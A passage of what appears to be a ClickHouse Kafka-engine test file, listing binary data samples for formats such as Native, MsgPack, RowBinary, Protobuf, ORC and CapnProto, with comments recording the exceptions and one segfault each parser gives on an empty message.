b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\